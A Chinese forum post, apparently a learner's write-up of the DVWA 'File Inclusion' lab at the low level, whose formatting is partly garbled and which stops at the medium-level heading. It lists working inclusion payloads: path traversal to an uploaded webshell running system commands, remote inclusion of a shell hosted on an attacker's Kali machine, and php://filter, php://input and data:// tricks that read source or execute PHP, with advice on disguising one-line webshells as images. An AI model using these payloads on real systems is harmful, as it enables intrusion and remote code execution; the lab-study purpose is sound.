ToB企服应用市场:ToB评测及商务社交产业平台

标题: Day_3_文件包罗 [打印本页]
作者: 麻花痒    时间: 2024-7-11 21:58
标题: Day_3_文件包罗
第三天

DVWA靶机 File Inclusion
0x00 Low Level
总结
源代码:
  1. [/code]关于该漏洞的三种方法:
  2. [list=1]
  3. [*]文件上传
  4. [*]长途包罗
  5. [*]php伪协议
  6. [/list][i][b]注意[/b][/i]
  7. [b]1. 文件上传[/b]
  8. 利用之前上传的Websell.php文件,可以构造url
  9. [indent]url(相对路径)
  10. http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=../../hackable/uploads/Webshell.php&cmd=system("dir");
  11. url(绝对路径)
  12. http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=http://127.0.0.1/DVWA-master/hackable/uploads/Webshell.php?cmd=system("dir");
  13. [/indent][list=1]
  14. [*]../代表退回上个目次
  15. [*]相对路径的url用?给cmd传参会产生报错,指出[b]include_path[/b] 因为php将?后面的当作参数而不是路径,但是include照旧当作路径,所以包罗的文件要想传递参数可以利用&
  16. [/list][indent]源码index.php
  17. [/indent][code]if( isset( $file ) )
  18.    include( $file );
  19. else {
  20.    header( 'Location:?page=include.php' );
  21.    exit;
  22. }
复制代码
关于include
NEW IDEA
文件上传漏洞可以和文件包罗漏洞连用,比如说如果一个服务器既可以文件上传又可以文件包罗,可能在文件上传的时候限制了必须是图片类型同时还没办法绕过,那么可以思量将一句话木马改成图片的形式,从而乐成上传,得到上传的地点,通过文件包罗在url中进行执行该文件,通常选择在当前目次下生成新的shell脚本然后与蚁剑等管理脚本的工具连接。
常用的一句话木马:
  1. [/code][indent][b]在当前目次下建立php文件,内部内容为一句话木马[/b]
  2. [/indent][b]2. 长途包罗[/b]
  3. 指文件在攻击机中并未上传,但是却可以在url中输入其所在位置,而且服务器可以执行。
  4. 这里因为靶机建在D盘所以可以将C盘模拟视为攻击机所在位置,而一样平常情况下都会思量将虚拟机视为攻击机
  5. [b]如果将虚拟机(kali)视为攻击机[/b]
  6. [list=1]
  7. [*]虚拟机开启[b]apache[/b]。
  8. [*]从虚拟机的[b]本地网络文件[/b]下(var/www/html)存放用于攻击的脚本文件。
  9. [*]在被攻击服务器的url中page传参过程中输入kali虚拟机ip地址
  10. [indent] ?page=http://ip/Webshell.php
  11. [/indent]
  12. [/list][b]3. PHP伪协议[/b]
  13. [indent]一样平常的解释:
  14. [i]PHP伪协议是一种特殊的协议,它可以让PHP执行一些特定的操作。固然称为“伪协议”,但实际上它并[b]不是真正的协议[/b],而是一种[b]通过URL来执行特定的PHP代码[/b]的机制。[/i]
  15. [/indent][i][b]url中利用特殊的前缀指示php执行特定的代码[/b][/i]
  16. [list]
  17. [*]一些伪协议类型
  18. [/list](1) file://
  19. [indent]访问本地文件
  20. [/indent][code]$contents = file_get_contents(‘file:///path/to/file.txt’);
复制代码
(2) http:// && https://
通过HTTP访问长途的资源
  1. $content = file_get_contents('http://example.com');
复制代码
(3) php://
将PHP代码作为字符串传递给PHP函数进行处理,常用于动态生成代码或执行简单的盘算。
php://filter
  1. ?page=php://filter/read=convert.base64-encode/resource=file1.php
复制代码
通过php协议读取本地敏感的源代码,颠末base64加密,返回
需要知道网站的目次结构,文件的路径
php://input
post请求中的数据作为PHP代码执行
  1. url: ?page=php://input
  3. post: <?php phpinfo(); ?>
复制代码
可以尝试用Burpsuite进行抓包,将url修改为?page=php://input ,然后在抓包的末端,参加盼望执行的php代码。
(4) data://
将数据嵌入到 PHP 脚本中,与php://input类似是执行代码,但是不同的是执行的方式。
  1. url1: ?page=data:text/plain,<?php 执行内容 ?>
  2. or
  3. url2: ?page=data:text/plain;base64,base64编码后的php代码
复制代码
这两个方法在本题中都颠末实验是可行的
0x01 Medium Level
源码:
[code]



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4